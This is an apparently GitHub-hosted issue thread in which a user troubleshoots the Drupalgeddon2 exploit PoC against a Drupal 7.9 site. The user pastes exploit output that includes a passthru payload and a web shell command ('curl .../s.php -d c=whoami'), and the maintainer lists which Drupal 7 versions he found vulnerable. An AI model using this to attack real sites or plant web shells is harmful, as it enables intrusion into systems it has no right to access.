Drupal v7.9 - "[+] Drupal!: can detect a matching directory"

[kill-20]

Hi! Thank you for sharing this PoC! It works like a charm on my 7.28 and 7.56. However, on 7.9 site I only get

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[*] Target : http://xxxxx/
--------------------------------------------------------------------------------
[!] MISSING: http://xxxxx/CHANGELOG.txt (404)
[!] MISSING: http://xxxxx/core/CHANGELOG.txt (404)
[+] Found  : http://xxxxx/includes/bootstrap.inc (200)
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[*] Payload: echo TZPPOZNH
[!] Unsupported Drupal version

Obviously, exploit encounters some problems while determining drupal version. Earlier versions of the exploit respond with

*nothing interesting above, I think*
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] PHP cmd: passthru 
--------------------------------------------------------------------------------
[+] Target seems to be exploitable! w00hooOO!
[+] Result: *lots of html code of http://xxxxx/?q=user/password/*
--------------------------------------------------------------------------------
[*]   curl 'http://xxxxx/s.php' -d 'c=whoami'
--------------------------------------------------------------------------------
[!] Exploit FAILED ~ Response: 404

I would appreciate any help getting this exploit to work. Thanks in advance. Regards, kill-20

[g0tmi1k]

I will install it locally (I've not tried that version) and get back to you

---

Edit: Yup. I'm having the same issue too. I wonder if v7.9 is vulnerable to it.

[g0tmi1k]

So I've had a play about with a few v7.x:

v7.22 - not vulnerable
v7.23 - vulnerable
...
v7.57 - vulnerable
v7.58 - not vulnerable

The exploit may need tweaking for a larger range of versions!